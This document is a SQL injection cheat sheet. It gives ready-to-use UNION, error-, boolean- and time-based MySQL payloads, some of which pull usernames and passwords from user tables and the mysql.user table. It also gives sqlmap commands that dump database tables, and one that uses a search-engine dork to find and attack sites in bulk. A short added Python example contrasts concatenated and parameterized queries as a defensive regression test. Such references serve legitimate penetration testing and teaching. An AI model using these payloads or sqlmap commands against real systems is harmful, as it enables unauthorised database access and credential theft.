# SQL Injection

## UNION-Based

```
# How To Detect
'
-- abc

# Find Number Of Columns
' ORDER BY 2-- abc
' UNION SELECT NULL,NULL-- abc

# Test Columns Data Types
' UNION SELECT 'a',NULL-- abc
' UNION SELECT NULL,'a'-- abc

# Print Database Version
' UNION SELECT @@version,@@version-- abc

# Print Multiple Values On One Column
' UNION SELECT CONCAT(username,'~',password) FROM users-- abc

# Print Databases and Tables
' UNION SELECT table_name,table_schema FROM information_schema.tables-- abc

# Print Tables and Columns
' UNION SELECT table_name,column_name FROM information_schema.columns WHERE table_name ='user'-- abc

# Print Specific Database, Table and Columns
' UNION SELECT host,user FROM mysql.user-- abc
```

## Error-Based

```
' AND EXTRACTVALUE(0x0a,CONCAT(0x0a,(SELECT @@version)))-- abc

' AND EXTRACTVALUE(0x0a,CONCAT(0x0a,(SELECT schema_name FROM information_schema.schemata LIMIT 0,1)))-- abc
```

## Boolean-Based

```
# Detect
' AND 1=1-- abc
' AND 1=2-- abc
' AND '1'='1
' AND '1'='2

# Print Database Version
' AND @@version = '8.0.28'-- abc
' AND @@version LIKE '8.0.28'-- abc

# Print Database Version Character By Character
' AND SUBSTRING((SELECT @@version),1,1) > '7'-- abc
' AND SUBSTRING((SELECT @@version),2,1) = '.'-- abc

# Print Database Name
' AND SUBSTRING((SELECT table_schema FROM information_schema.tables LIMIT 1),1,1) = 'i'-- abc

# Print Specific Entry
' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) > 'm

# Boolean Conditional Errors
' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a
' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a
' AND (CASE WHEN (SUBSTRING((SELECT table_schema FROM information_schema.tables LIMIT 1),1,1)='i') THEN 1/0 ELSE 'a' END)='a'-- abc
```
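The detection probes listed above (the lone quote, the `AND 1=1` / `AND 1=2` pair and the `UNION SELECT NULL,NULL` column probe) only have an effect when user input is concatenated into the SQL text. The following is an added example, not part of the original cheat sheet, that runs those probes against a concatenated query and a parameterized one. It assumes Python's built-in `sqlite3` instead of MySQL so it runs offline; the `products` table and the function names are hypothetical.

```python
import sqlite3

def make_db():
    # Constructed sample data; table and column names are hypothetical.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER, name TEXT, category TEXT)")
    db.executemany("INSERT INTO products VALUES (?, ?, ?)",
                   [(1, "mug", "gifts"), (2, "card", "gifts"), (3, "lamp", "home")])
    return db

def lookup_concat(db, category):
    # Vulnerable: the input becomes part of the SQL text, so a quote ends the
    # string literal and everything after it is parsed as SQL.
    sql = "SELECT id, name FROM products WHERE category = '" + category + "'"
    return db.execute(sql).fetchall()

def lookup_param(db, category):
    # Hardened: the input is bound as a value and is never parsed as SQL.
    sql = "SELECT id, name FROM products WHERE category = ?"
    return db.execute(sql, (category,)).fetchall()

def quote_causes_error(lookup, db):
    # Lone-quote probe: a syntax error means the input reached the SQL parser.
    try:
        lookup(db, "'")
        return False
    except sqlite3.OperationalError:
        return True

def boolean_differential(lookup, db, base):
    # True/false pair: differing row counts mean the condition was evaluated.
    true_rows = lookup(db, base + "' AND 1=1-- abc")
    false_rows = lookup(db, base + "' AND 1=2-- abc")
    return len(true_rows) != len(false_rows)

def union_executed(lookup, db, base):
    # Column-count probe: a (NULL, NULL) row in the result means UNION ran.
    return (None, None) in lookup(db, base + "' UNION SELECT NULL,NULL-- abc")

if __name__ == "__main__":
    db = make_db()
    for fn in (lookup_concat, lookup_param):
        print(fn.__name__,
              "quote error:", quote_causes_error(fn, db),
              "boolean differential:", boolean_differential(fn, db, "gifts"),
              "union executed:", union_executed(fn, db, "gifts"))
```

The same three checks can be used as regression tests: every query path should report `False` for all of them once it binds parameters.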

## Time-Based

```
' AND SLEEP(5)-- abc

' AND IF(1=1,SLEEP(5),'a')-- abc

' AND IF((SUBSTRING((SELECT table_schema FROM information_schema.tables LIMIT 1),1,1)='i'),SLEEP(5),'a')-- abc
```

## SQLMAP

```
sqlmap -u "https://domain.com/product.php?id=1" -p id --proxy http://192.168.43.164:8080 --random-agent --delay 0.5 --threads 10 --flush-session -v 3

sqlmap -g inurl:/product.asp?id= --random-agent --batch --smart

sqlmap -r request.txt --force-ssl --random-agent --level=3 --risk=2 --technique=B --threads=10 --banner --dbs

sqlmap -r request.txt --force-ssl --random-agent -D database_name -T table_name1,table_name2,table_name3 --dump

sqlmap -r request.txt --force-ssl --random-agent -v 4 -p "id,cookie" --cookie="_ga=*" --skip "code,x,host,user-agent,referer"
```


Reference: <https://portswigger.net/web-security/sql-injection/cheat-sheet>

